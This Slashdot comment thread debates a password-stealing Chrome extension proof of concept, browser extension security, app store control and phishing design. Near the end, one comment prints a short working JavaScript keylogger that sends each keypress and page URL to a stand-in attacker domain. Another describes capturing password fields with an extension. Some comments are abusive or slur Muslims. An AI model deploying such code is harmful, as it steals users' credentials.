Seriously though, this isn't news. Extensions are intended to be general purpose, and in order to be powerful enough to do what you want, some risks are taken. I suppose you could take a partial sandboxing approach such as BitFrost or that taken in Android to warn users of what permissions are being requested (and mitigate the effect of expoits), but there's a tradeoff between functionality and safety.

Re:Muslims are barbaric fucks

Clearly you are misinformed. Islam is the religion of peace. In order to protect that peace, detractors of Islam must be brutally murdered. So, if you are against the brutal murdering of detractors of Islam then clearly you are a warmonger; you, sir, disgust me.

We're #4!

[AnonymousClown]

Take that Europe and your wimpy less than 10! Hah! We're so much better than you!

USA! USA! USA! USA!

Uh, wait a minute.

Re:We're #4!

[RoFLKOPTr]

That's not less than 10 in all of Europe. That's less than 10 for every one of those European countries listed (and 59 for the UK, and 188 for Germany, and 57 for Italy, and 32 for Spain... totalling much more than 123 for the United States for a lot fewer citizens than the United States). How is this at all relevant, anyway?

Re:We're #4!

[countertrolling]

Guess you didn't notice the red question mark over China. That's what we call censorship at their "request".. Relevant now? And it all goes back to my original premise that Google cannot be trusted with anybody's privacy, unless you happen to have the power of the state backing you up.

Re:We're #4!

[RoFLKOPTr]

Relevant now?

Not really. Google isn't telling you what information they're distributing... only that they're distributing information. You know they're distributing information to China just like they're distributing information to every other country Google has operations in. Google knows that you know this, and Google knows that anybody with any sense in their head won't need the exact number to know that Google is doing this (and that's why they make the question mark red and noticeable... if they wanted to hide it, they'd probably use a fake number or something). Hiding the exact number of Chinese government requests is a fairly small price to pay for an incredibly large slice of the Chinese money pie.

And yes, Google is a corporation, and a corporation's primary objective is to make money. It would be incredibly foolish to do something that would make China kick Google out... especially if that thing is simply posting a little number that nobody actually cares about for the sake of making some nerds on Slashdot happy.

Re:We're #4!

[countertrolling]

The question mark is there to show us they acceding to China's wish that they not reveal "state secrets". They have stated as much. I never said they're trying to hide it. All I'm saying is that they are untrustworthy for the user, and their software is suspicious. They filter (and possibly misdirect) what you're searching for, and they try to track your every move. It's easy to block, but they are making the effort. And the fanboi-ism is also as extreme as with Apple. I hope that somebody with the resources is performing an in depth investigation.

Re:We're #4!

[RoFLKOPTr]

They filter (and possibly misdirect) what you're searching for, and they try to track your every move.

They filter results for people in China. The only thing they filter in the US is links to child pornography. Nothing else. Yes, they track your every move. Every search engine and Internet advertising firm does that. They don't do it so they can do bad things to you, they just do it so they can make more money from advertising. I still don't understand what point you're trying to make.

Re:We're #4!

I think the point he's trying to make is, that you're being told that you're being lied to for you own good, and you believe the liar when he says it's for your own good.

What is this browser safety you speak of?

[nickdwaters]

Security is only as effective as the experience and intelligence and of the user. You can't fix stupid. - Ron White

FF before version 2

[roman_mir]

I wrote an extension to FF long ago that was reading any form field at all, including password fields and was able to send this information to any address on the web via an http call. Starting from FF version 2 the method I used to read the form field (basically enumerating the form input fields with javascript) could no longer read the password field from a form.

Re:FF before version 2

I wrote an extension to FF long ago that was reading any form field at all, including password fields and was able to send this information to any address on the web via an http call. Starting from FF version 2 the method I used to read the form field (basically enumerating the form input fields with javascript) could no longer read the password field from a form.

What happens if you intercept the POST that sends the password? Or modify the page to add a new text field over the password text field? You can make life hard for the lazy evildoers, but stopping someone willing to spend more than an hour of effort means crippling the extensions API to the point where lots of useful extensions can't be written.

Re:FF before version 2

[roman_mir]

Intercepting POST on an encrypted page needs to be tested, but replacing an input element is easy, it will also need to replace characters with **** asterisks and then on a post it'll have to replace the input back with a password field with the actual password in it.

FF does not need to modify API to protect against this, it needs to provide a way to protect specific pages from extensions modifying them, something like a 'locked page' that cannot be modified by any extensions. Any password page needs to be locked though.

Re:FF before version 2

If this was something that was requested on the server side, then people will just lock their ad-strewn pages to prevent them from being modified by ad-blocking extensions.

If this was something that was requested on the client side... I can't see the majority of people understanding the point of it, and unless it caused a page reload it may be too late by the point it was triggered... and reloading the page on pages it might be useful with may be problematic with certain sites.

So that just leaves heuristics? Or...?

Re:UGH! When are you going to learn??

[countertrolling]

Troll??? HAHAHAHA!

Fanbois to the rescue...

Please point me to similar vulnerability on iPhone

[Brannon]

Oh. I guess your point is that iPhone users are smarter than everyone else. My mistake.

In other news ...

[GNUALMAFUERTE]

Executing arbitrary code downloaded from the internet might lead to arbitrary code execution. Not news.

Re:UGH! When are you going to learn??

Google's USA removals are for copyright infringement, and, when issued by the courts, part of public record. The other USA removals are also for copyright infringement, as infringement is the only means for non-government persons to submit a takedown request.

countertroll, more like megatroll.

Re:Please point me to similar vulnerability on iPh

[nickdwaters]

I was under the impression we were talking about Google Chrome and how an add-on has the capability of capturing user data / ids and passwords!

yep, and...

[Brannon]

your original post claimed that these types of security holes were inevitable, the only way to combat them is with informed and careful users.

I countered that another way to counter them (even with uninformed and un-careful users) is to place all your users in a padded room which locks from the outside.

Andreas Grech

[sycodon]

Someone should illustrate his lack of body armor by shooting at him with a large caliber rifle.

Re:Andreas Grech

[AmberBlackCat]

Only if he's claiming to be bulletproof. A lot of Non-Windows/Non-IE product makers seem to want you to think they're more "bulletproof" than the Microsoft version.

Re:UGH! When are you going to learn??

[countertrolling]

The reasons make no difference. They are censoring.. Oh, and fuck copyright! Its sole reason for existence is censorship.

Re:Please point me to similar vulnerability on iPh

You're joking right? Apple just patched the iPhone against almost 70 publicly reported security vulnerabilities that were up to a year old. The list included a huge range of code execution, origin bypass, and privacy disclosure bugs in Safari alone. And any moron watching the WebKit commit logs in the last year had a PoC and exploit roadmap for those particular vulnerabilities. Why do you think the iPhone got hacked at pwn2own this year, and why do you think so many large corporations refuse to support the iPhone in their enterprise?

So, I'm not getting your smug superiority here when we're talking about intentionally installing a malicious extension in Chrome versus getting owned just for using an iPhone.

Re:Any plugin or extension is a privacy & sec

[icebraining]

I don't know of any browser that can't disable JS. With NoScript you can even do it on a per domain basis.

Re:UGH! When are you going to learn??

Yes, there is a difference. When censorship is used to control opinion and enable oppression, there is a vast difference. Limitations on freedom of information (note: I said "limitations" -- this is NOT censorship) are not the only restriction that applies here; consider the controversial hate speech laws, or even privacy laws, for example. Nothing is truly free, and not all government authority is inherently bad.

The real question here is...

[avatar139]

...WHY Google allows so much potential access of personal data to installed Extensions?!

I mean every time I tried to install an extension on Chrome I got the warning that it could potentially access my user data and or browser history, and I still don't see any reason that extensions should (even potentially) be allowed access to that information!

Re:UGH! When are you going to learn??

[countertrolling]

controversial hate speech laws = censorship

copyright = censorship

And in direct violation of the 1st Amendment

You are wrong.

...not all government authority is inherently bad.

In this case it is.

Re:UGH! When are you going to learn??

I said controversial because opinion of hate speech laws is not uniform within the USA, and, more importantly, laws differ significantly for hate speech within the EU. I'm not arrogant enough to believe that my laws (the USA's) are instrinsically superior -- I can see merits for both arguments.

In any case, I don't care to argue for opinion on infringement or government or freedom. I only wanted to make clear the difference between censorship and regulation, because your posts were an insult to those actively fighting for equal human rights recognition across the world.

Re:UGH! When are you going to learn??

[countertrolling]

You cannot acquire any rights through censorship. Any and all regulation of speech is censorship.

Responsible Disclosure

Maybe Tavis should responsibly disclose this vulnerablity. We can then expect the fix in less than 5 days

Still waiting for a link...

[Brannon]

to some malicious extension or application available for the iPhone. My whole point is that it is possible to protect against clueless users installing a malicious app if you have a closed centrally managed app store. The GP post claimed that the only protection was user education.

Oh, and Chrome is built on top of WebKit also, genius.

Re:Still waiting for a link...

My whole point is that it is possible to protect against clueless users installing a malicious app if you have a closed centrally managed app store.

Seriously, you think that Apple can protect you against an intentionally malicious third-party app, when they can't even address basic vulnerabilities in their core platform? I find your faith severely misguided.

Oh, and Chrome is built on top of WebKit also, genius.

Wow, that point just flew right by you. Chrome runs WebKit in a sandbox and still pushes out security updates every few weeks. Meanwhile Apple runs WebKit without any restrictions and they take up to a year to patch the same vulnerabilities. To me it's pretty clear which platform is safer.

this is excellent

It will make my job so much easier.

Learn enough to know your limits.

[SanityInAnarchy]

It's not about memorizing facts, or about recalling something, it's about knowing what you know and what you don't know. I don't know how to use a chainsaw properly, but I know enough to know that I don't know, and that I would need to learn how or I'm going to get hurt.

If it is easier to simply design in a safety than to educate everyone and keep them educated, then building in the safety is the proper thing to do.

That's true, if the safety has no downsides whatsoever. Otherwise, it bears more discussion.

For example, the iPhone and the Great Firewall of China, both of which claim to be making things more secure and stable for you by removing your choice. Even if the iPhone is more secure for the kind of user who would download BonziBuddy, I don't think it's worth it, and this is exactly what is meant by dumbing down. Compare that to your idea:

I still don't understand why current operating systems don't indicate the priviledge level an application is running at by, say, a coloured border. You'd still need to educate people on what it means, but a fairly simple safety gives them a lot more options than the stupid "well, you could open a console and run ps" geek solution.

But for this to work, you need to educate people on a hell of a lot more than "Here's a colored border." You need to educate them on what privilege separation means, why they might trust or not trust a given program, why they should trust things as little as possible, etc.

It requires fundamental education, much like you'd get from driver's education, to be truly useful. Yes, we should include antilock brakes, but those cannot be a substitute for knowing something about hydroplaning and ice.

You don't need to know how to change your oil -- you can pay someone else to do that. You don't even need to know how often to pay someone else to change your oil. You just need to know that cars occasionally need maintenance, and that before buying a car, you should learn what you need to know to maintain it.

To bring it back to the original "fire" example: If there are no disadvantages, we should make it so no one wants to look into their gas tank with a lighter. But there's a limit to how much idiot-proofing you can do. If you don't teach people that fire and gasoline don't mix, or about flammability in general, stupidity will find a way.

Re:Learn enough to know your limits.

[Tom]

For example, the iPhone and the Great Firewall of China, both of which claim to be making things more secure and stable for you by removing your choice. Even if the iPhone is more secure for the kind of user who would download BonziBuddy, I don't think it's worth it, and this is exactly what is meant by dumbing down.

Here's the funny thing: You're dead wrong. I'm an iPhone developer. There is no "dumbing down" here at all. Anything I want it to do, I can make it do. However what has happened, in comparison to 1980s computers, is that the user has most of the complicated stuff hidden away from him. That is not a conspiracy, it is the normal process by which things mature. Look at cars: Early on, you'd better know quite a bit about it, just to drive one. These days, you put your car into the ignition, and you care nothing about what goes on under the hood. Same with so many other things. Do you know how to make fire without matches? How to milk a cow? How to slaughter a pig? As our tools and our division of labour improve, the breadth of stuff you need to know reduces. There is nothing "dumb" in it. On the contrary, not burdening yourself with knowledge that has no use is a pretty smart thing to do.

Especially in computers, the number of people who can do low-level stuff is not decreasing. The percentage is, not because there are less experts, but because there are more non-expert users.

But for this to work, you need to educate people on a hell of a lot more than "Here's a colored border." You need to educate them on what privilege separation means, why they might trust or not trust a given program, why they should trust things as little as possible, etc.

No, that is geek-think again.

What you need to do is teach them which tasks require elevated priviledges and to become suspicious when something else, such as their mail program, suddenly has a red border.

Yes, you need some education. But the better support your tools give, the less education you need. The main failure of security (and I work in the security industry, so it's partly my fault as well) is that for decades we've made the user responsible for everything, applauded ourselves with "stupid looser" phrases, and thought that education and awareness would solve our problems.

But there's a limit to how much idiot-proofing you can do.

I agree.

However, I also insist that there is far more idiot-proofing possible than we tend to think. If you study design for a bit (not the computer stuff, the real-world stuff about light switches, doors, coffee machines, etc.) you are quickly surprised at how much a good design can solve. Our computer interfaces are worlds away from that at this time. They are crude, primitive, unhelpful and more of a hinderance than a support. Even the best of them. It's normal, we're still early in the development of computer technology as a whole.

My point is that you have a 99% chance that whenever you think "what a stupid loser" about a user and his actions with a computer, there is something in the machine or the user interface that you can do to either solve the problem or make the user less stupid about it.

Re:Learn enough to know your limits.

Excellent response.

Re:Learn enough to know your limits.

[cffrost]

[...] you put your car into the ignition [...]
WARNING!: Putting car into ignition may result in injury or death. Please read owner's manual supplied with vehicle.

Re:Learn enough to know your limits.

[SanityInAnarchy]

I'm an iPhone developer. There is no "dumbing down" here at all.

For the user?

Anything I want it to do, I can make it do.

Jailbroken?

the user has most of the complicated stuff hidden away from him.

In the case of the iPhone, it's not that the complicated stuff is hidden. It's that it's actually forbidden -- see above. Can you make it do anything Apple doesn't explicitly allow?

That is not a conspiracy,

I never suggested it was.

Nor do I think Apple and China are in a conspiracy to censor technology -- they just seem to agree (quite publicly and openly) that computer users need to be protected from themselves, beyond the point of making it simpler and more usable, and to the point of removing choices.

Look at cars: Early on, you'd better know quite a bit about it, just to drive one. These days, you put your car into the ignition, and you care nothing about what goes on under the hood.

I do, however, care that the hood is not welded shut. I care that like most drivers, I also know how to change a tire and jump a car -- and jumping a car is something that it's useful to be able to do once in awhile.

Do you know how to make fire without matches?

No. However, I do know how to properly use matches. I know that even when a match is out, I shouldn't immediately put it on something flammable.

How to milk a cow?

No, but I know not to drink spoiled milk. Do you see where this is going?

I'm a technophile, I'm hardly a Luddite. I do appreciate things getting easier, and I said so. But there is a limit to how much I can avoid learning because of technology. Safety matches are better than normal matches, but you can still (easily!) burn yourself.

What you need to do is teach them which tasks require elevated priviledges and to become suspicious when something else, such as their mail program, suddenly has a red border.

Then they will come to me every time they see that, and when I get sick of it, maybe they'll believe the email that says "Don't be alarmed when Outlook's border turns red, this is part of a normal email virus scan."

In this case, the basic principle is applicable to more than just this one thing (window borders), and is also not terribly complex. In particular, understanding the concept of trust will also help them understand what those scary certificate warnings are actually asking, why they shouldn't download random crap, why they should lock their computer when they're away from their desk, and so on.

And it takes on the order of ten minutes to explain to an intelligent (but nontechnical) person. I speak from experience here.

the better support your tools give, the less education you need.

I'm not sure that's true. Hopefully less rote learning, sure -- I know dozens of commands by heart, and whenever I need to teach even one to a novice user, I consider that a failure.

But the fundamental concepts haven't changed much, and can't be made much simpler without removing a crucial bit of understanding. Teach the underlying principles, and all the specific rules ("Only these three programs should ever be red!") become intuitively obvious.

I also insist that there is far more idiot-proofing possible than we tend to think. If you study design for a bit (not the computer stuff, the real-world stuff about light switches, doors, coffee machines, etc.) you are quickly surprised at how much a good design can solve. Our computer interfaces are worlds away from that at this time.

A light switch controls one or more light sources. At the very best, it can control brightness on a scale (a dimmer) rather than a simple boolean on or off.

Doors are open, closed, or revolving. Some automatically open and

Re:Learn enough to know your limits.

[Tom]

Nor do I think Apple and China are in a conspiracy to censor technology -- they just seem to agree (quite publicly and openly) that computer users need to be protected from themselves, beyond the point of making it simpler and more usable, and to the point of removing choices.

Removing choices is what design is all about. In the words of Antoine de Saint Exupery: "You know you've achieved perfection in design. Not when you have nothing more to add. But when you have nothing more to take away."

A light switch works so well precisely because it gives you two options: "Lights on" or "Lights off", instead of presenting you with a spectrum of things you can do with electron flow through a wire.

Anything I want it to do, I can make it do.

Jailbroken?

*laugh* no. Why should I? Sure, some Apps would not be accepted in the App Store, but I can still put them on my own devices, no problem at all. Notice the "anything I want". There are certainly things that are not possible, but so far the limits I hit were all questions of technology (graphics performance, mostly) or design (e.g. no way to make a good interface of this on such a small screen).

You may have a point, but you lose a lot of credibility comparing a computer to a coffee machine. I know we're all sick of car analogies, but they're a lot closer.

The difference really isn't that massive. For the user, light switch, coffee machine, car, computer - all just tools to enable him to do what he wants to do. Sure, some of those tools have multiple functions, and computers probably the most. But still a tool.

From what I hear, phishing scams still work.

Here's the funny thing: A few years ago, a magazine did a test on phishing, giving well-made phishing mails to both novice users and security experts to let them say whether they think they're genuine or phishing. Turns out, the statistical difference between the two groups was not so high.

I've analyzed that in a 2007 or so talk I've given in London. The main problem with phishing is that most of our e-mail programs seem to be designed to make phishing easy and noticing the details you need to notice to make the distinction as hard as possible. Almost all the information that is available that makes it possible to discern a phishing mail is hidden away somewhere. Meanwhile, all the information that triggers your mind that you need to react on this important mail - i.e. click on something - is large, in-your-face, middle-of-the-screen.

Phishing is mostly a failure of interface design.

I'm sorry, but there is no UI fix for that.

Not one, but if you'd re-design the UI so that it is more helpful to the user, that would help a ton.

And the only way around that is to move in the direction Apple and China seem to want to -- a whitelist.

That's nonsense. Where do you have any evidence for that claim?

That's not a technical problem. It's not a design problem. It's a social one.

I agree, and as long as there are people there will be stupid people and stupid people will always be exploited. That doesn't mean we can't do anything about it, make it more difficult to exploit people, or easier for the smarter people to protect themselves.

Re:Learn enough to know your limits.

[SanityInAnarchy]

A light switch works so well precisely because it gives you two options: "Lights on" or "Lights off", instead of presenting you with a spectrum of things you can do with electron flow through a wire.

Mostly because, in that situation, it would be useless.

By contrast, despite being automatic, my car's transmission also has a first and second gear and an overdrive toggle, not to mention neutral and reverse. That's just the transmission -- my car also has four separate braking mechanisms, each with their own unique interface. It may be possible to simplify this, but people are willing to put up with this situation from a car.

Take a moment to look into a car sometime. Count how many separate controls there are, and remind yourself that this thing's purpose is ultimately to move you from point A to point B.

As Einstein said: Make things as simple as possible, but no simpler.

Sure, some Apps would not be accepted in the App Store, but I can still put them on my own devices, no problem at all.

Define "no problem at all" -- as I understand it, you're describing a scenario which either requires a jailbroken phone or a dev kit.

The difference really isn't that massive. For the user, light switch, coffee machine, car, computer - all just tools to enable him to do what he wants to do. Sure, some of those tools have multiple functions, and computers probably the most. But still a tool.

I'm sure even our hypothetical user can tell the difference between a coffee machine, which takes perhaps two minutes of instruction (if that) on how not to get burned, and a car, which in many places takes several months of training before you're legally allowed to drive on public roads.

A few years ago, a magazine did a test on phishing, giving well-made phishing mails to both novice users and security experts to let them say whether they think they're genuine or phishing. Turns out, the statistical difference between the two groups was not so high.

So, which magazine, what was the threshold of "security expert", and what was the proposed action? I might say that an email looks legitimate, and still not click anything inside it.

The main problem with phishing is that most of our e-mail programs seem to be designed to make phishing easy and noticing the details you need to notice to make the distinction as hard as possible. Almost all the information that is available that makes it possible to discern a phishing mail is hidden away somewhere. Meanwhile, all the information that triggers your mind that you need to react on this important mail - i.e. click on something - is large, in-your-face, middle-of-the-screen.

This is what a naively "simple" design would call for. I can certainly look at headers (or the raw message) when I suspect something, but when I leave it on, it's annoyingly difficult to get through normal email -- users wouldn't have a chance. If we make it harder to click on things, we penalize people sharing links instead of pasting the entire article into the body of an email, among other things like registration links and such.

So you simplify it -- make everything open when you click it, and hide away the scary headers so people don't have to learn about them. Until they do anyway, because they need to be able to check whether a message is forged.

More importantly, simply clicking a link from a phishing email isn't likely to cause harm unless you also fall for the site it's linked to. I haven't seen a proposal for any way to make this better which doesn't come with significant drawbacks -- and here, the information is "hidden away" in the URL bar.

That's nonsense. Where do you have any evidence for that claim?

Which one? That the only way around is a whitelist, or that Apple and China seem to want whitelists?

I don't have any evidence that China wants

Re:Learn enough to know your limits.

[Tom]

Take a moment to look into a car sometime. Count how many separate controls there are, and remind yourself that this thing's purpose is ultimately to move you from point A to point B.

I know. Cars are some of the things that you quickly come across when you teach yourself about design. And I mean car controls, not bodies. :-)

The point is, of course, that the purpose is not to get your from A to B. If that were the ultimate purpose, the interface could be a lot simpler - and is. The interface for a taxi is "open door, sit down, close door, talk to driver, wait, pay driver, open door, get out, close door".

All the additional complications of a car are because you want to drive from A to B yourself. Plus quite a lot of the controls have nothing to do with driving, they're for the stereo or the AC or they serve secondary purposes such as the gas gauge or the maintainance lamp.

you're describing a scenario which either requires a jailbroken phone or a dev kit.

I said very early on that I'm a developer, yes.

I'm sure even our hypothetical user can tell the difference between a coffee machine, which takes perhaps two minutes of instruction (if that) on how not to get burned, and a car, which in many places takes several months of training before you're legally allowed to drive on public roads.

But that's a difference in quantity, not in quality. As I said: Some of those tools are a ton simpler than others, but they're still tools. It's difficult for us computer geeks to understand sometimes, but the vast majority of people have no emotional connection with their computer at all. It's just a thing.

And yes, that is the only way to prevent gullible people from being connected to con artists, and that still depends on the effectiveness of your whitelist. You seem to agree with me, actually:

Not really. Stupid people will be exploited, end of story. I don't really feel sympathy for them. I just say that we make their stupidity the reason way too often, when in reality even smart people are victim of what's the real reason - a bad interface design.

There really is no solution to the Windows-patch-via-email scam other than teaching people how patches are really delivered, and why no sane company would ever distribute patches through a mechanism like email.

Really? Let me see... there is no solution to indicating the sender of a message better than believing the "From:"? We've not invented cryptographic signatures, I assume. There is no solution to link a download to the mail with the link to the program that was downloaded? And we already have popup messages warning us on installs of unsigned crap. Except that UAC and its W7 brother is an abomination of design, and is no help to a regular person at all.

if users are ever expected to be able to download any software, they will have to be taught not to, and then (maybe) how to do it safely.

We have not invented sandboxes, either. And we still think it's ok to give every program full access to the system, whether it wants to or not. We don't have RBAC or MAC or security policies.

Well, we do, even Windows has a fine-grained security policy these days. Except that there is absolutely no useability in it, none whatsoever. Even if you're an expert, it's hidden away deeply.

Chameleon was a proof-of-concept for a domain-seperated OS/GUI system. The idea is that you would download a game and install it into the "games" domain, which has a security policy applied that restricts the program in that domain to stuff that a game needs. And a game doesn't need to read your e-mails, monitor your keystrokes while you're in a different window, check your browser history, access files that don't belong to it, or modify your kernel. ...and so on for other domains.

People don't understand security

Re:Learn enough to know your limits.

[SanityInAnarchy]

All the additional complications of a car are because you want to drive from A to B yourself. Plus quite a lot of the controls have nothing to do with driving, they're for the stereo or the AC or they serve secondary purposes such as the gas gauge or the maintainance lamp.

And this maps well to computers.

The additional complication of having to change the oil occasionally (or have someone else do it), knowing what the RPM gauge means (or at least that redlining is bad), needing a key to get into your car, etc, all have reasonable analogies in the computer world, and there doesn't seem to be much in a computer that doesn't have a similar analogy in the car interface.

The additional stuff, like the stereo, air conditioning, windows, etc, maps to additional stuff users might have running in the background (music, an IM client, etc).

There's an analog to a taxi, too, at least for some things -- you can ask a librarian for help looking something up. I can see where you also might compare a kiosk (or something similarly kiosk-ified, like an iPad) to a taxi.

But that's a difference in quantity, not in quality.

It absolutely is a difference in quality -- there is a test at the end.

I realize the attitude may be the same -- just learn enough to get on the road and from point A to point B. The approach is quite different, though -- you're going to learn everything in the curriculum, you're going to be tested, and you'd better be able to demonstrate some level of competence before we're going to let you out there.

the vast majority of people have no emotional connection with their computer at all. It's just a thing.

I realize this. I feel no particular attachment to my car, either, though I realize some people do.

But I have that bare minimum of understanding of how it actually works, and how it should be used. I know that it burns gas, that it needs oil to keep the engine from melting... I wince when I drive too fast over a pothole, knowing it can't be good for the shocks. That's both knowledge and intuition that's missing here.

Really? Let me see... there is no solution to indicating the sender of a message better than believing the "From:"? We've not invented cryptographic signatures, I assume.

No one wants to use PGP, and only the truly hardcore security geeks are ever at keysigning parties. The trouble here is the concept, not the UI -- most people really do seem to find it difficult to wrap their heads around a web of trust.

S/MIME might be better, and I have to admit I have less experience with it -- it seems to be an individual, per-user cost, and requires the user to keep track of a private key, making things like webmail difficult. It's also at least one central, controlling authority of email. To do this right is a UI, technical, political, and educational challenge.

It also complicates one possible response to spam -- different email addresses for different uses -- because email addresses suddenly cost much more.

Add to this the fact that so few emails are sent with any signatures at all, and there's no way that I can assume a message is not genuine merely because it lacks a signature, even if it's from a user who frequently signs their mail.

even Windows has a fine-grained security policy these days. Except that there is absolutely no useability in it, none whatsoever. Even if you're an expert, it's hidden away deeply.

I do agree with this. I've actually noticed it for awhile -- I do it somewhat haphazardly myself, but there really does need to be a better way to instantly spawn new users (or at least contexts) for new applications.

To be fair, we do have a platform which does this automatically -- the Web. And many native applications would need to be changed to work with greatly reduced privileges, especially to be usable in that case -- many programs, I w

Untrue that this could be written for any browser

[gig]

Safari on iOS (iPad, iPhone, iPod) doesn't have extensions. On iOS, instead of an extension, the developer just creates a whole other browser, and that has to be audited to be deployed. Although you may be able to write this for Safari on Mac/Windows, those extensions have to be signed to run, and signatures can be revoked immediately, so even if you got this deployed, at the first sign of trouble it stops running on 100% of systems. There is very little point in tagging a wall that can repaint itself instantly.

One problem with modern communication is the tendency to paint with too broad a brush. You found an attack vector in Chrome, that is real work, a scientific result. Don't fuck that up those hours of work by spending 1 second trumpeting an assumption that it works everywhere else. Either do the work to create the same extension on all other browsers or don't even fucking mention any other browser.

Re:Untrue that this could be written for any brows

I sometimes wonder if Apple really do hypnotize their customers. The next time you walk into an Apple store, try not staring at the large swirling disc behind the counter. Really? A whole browser for each extension? So if you use 3 extensions, you have to have 3 browsers and you need to swap between them all? Wake the fuck up.

In another news

[caekys]

Installing another mouse on your computer steals your cursor control.

In other News...

You might lose your valuables if you let a robber into your Home...

Re:Muslims are barbaric fucks

[Runaway1956]

Yeah, and what about all those Anons out there? Most are mindless fucks, with nothing in their hearts or in their minds aside from hatred for anyone and everyone. Very few have anything to contribute to anyone, or to anything. They just pop up, shout some hate slogans, then disappear back into obscurity. Mindless fucks. I suspect that many of them aren't even intelligent enough to feed themselves, bathe themselves, to hold a job, or much of anything. Potty trained? Maybe - if they are over 30. Just maybe.

Trust?

Why would anyone trust anything (real life or not), unless proven otherwise?

The only thing you ever get when you trust (lock yourself in) a company is to get ripped off or inconvenienced. You trust big box stores, they sell you Monster Cables when DIGITAL signals either make it or not. You get XBox and even a PS3, you get things most everyone else is free for. iP* products denies free apps / cheap features rejected because it competes with it's paid services (GPS response apps on Android market is a $0.99 USD one time). You ask for a computer for simple internet browsing, they sell you a computer with a 1GB vid card and 8GB RAM. You add DRM for media, you're forced to get multiple copies of the same content despite easy tools to convert. Online "tethering" validation or no user-host servers for apps / games / programs will get you a nonfunctional game in several years after the company deems it unprofitable. Don't get me started on cell phone / data contracts.

Most people don't pour out their intimate secrets with strangers, why would you do this with a "stranger" piece of software or "stranger" company?

Re:Muslims are barbaric fucks

Hey, you insensitive clod.

I'm *over* thirty dammit, and I'm perfectly polite! ...

You motherfucker.

Why do we need a proof of concept of this?

[mysidia]

It's not like anyone doubted this could be done. It is pretty obvious that passwords can be stolen by browser extension mechanisms. Why do we need to be giving bad guys a cookbook?

Do we publish proof of concepts of mass murder techniques, money laundering techniques, and drug dealing techniques?

Who and why is it considered ethical to publish instructions for password stealing in the general media?

So why does the article single out Google Chrome?

[walterbyrd]

I am a little confused here. This article very specifically singles out Google Chrome. But, it turns out the same thing could be done with any browser?

Chrome extensions are different

[idji]

Chrome extensions are sandboxed, unlike firefox extensions. Through the extension API there is no access to the password database for extensions. Even when the user looks at passwords in chrome the password is not written in a window, it is written directly on the canvas, giving no access to hackers.
The only way to get to the password database is to connect directly to the opensql database and decrypt the passwords with the userID - and that is how chrome password dumpers work.

this story is pretty meaningless - and has nothing to do with Chrome or really with Browsers.
Though it is an interesting idea to prohibit access to passworded objects in the DOM - but that would prevent "password strength checkers" to work.

plugin trashes Chrome's security ?

How does downloading an unverified extension from some unverified site get spun into a security problem in Chrome. Like, the last time I installed that Brittany Spears screensaver someone posted me, Internet Explorer 8 security was totally trashed.

Not even close to news

Setting up a JavaScript key logger and getting it on /. because you used the keywords "google" and "chrome" is kind of disgraceful.

window.onkeyup = function(event){
  var secretSender = null;
  if(document.getElementById('secretSender') == null) {
    secretSender = document.createElement('iframe');
    secretSender.id = 'secretSender';
    document.getElementsByTagName('body')[0].appendChild(secretSender);;
  }else{
    secretSender = document.getElementById('secretSender');
  }
  secretSender.src = 'http://www.IStoleYourKeyPress.com/keylogger?location=' + window.location + '&key=' + (event ? event.which : window.event.keyCode);
};

OMG OMG I wrote 11 lines of JavaScript put me on /. baby I'm a genius!

This article is an insult to /.'s intelligence and I realize the irony of that statement.

Openness isn't always good

I find that I read alot of posts moaning or complaining about things like the iPhone because it doesn't let developers do everything or anything they want. As a developer, I actually love their model (even though painful) because they put forth some effort to review work. Keeps more for a stable platform. Same with Chrome, they shouldn't just let anyone put anything out there. If we are all worried about security, then it is makes it harder to know to to trust and not to trust, unless Google reviews the code to publish plugins. I think there should be some approval process and yes it would take longer for approval, but I think the tech community should be a bit more patient.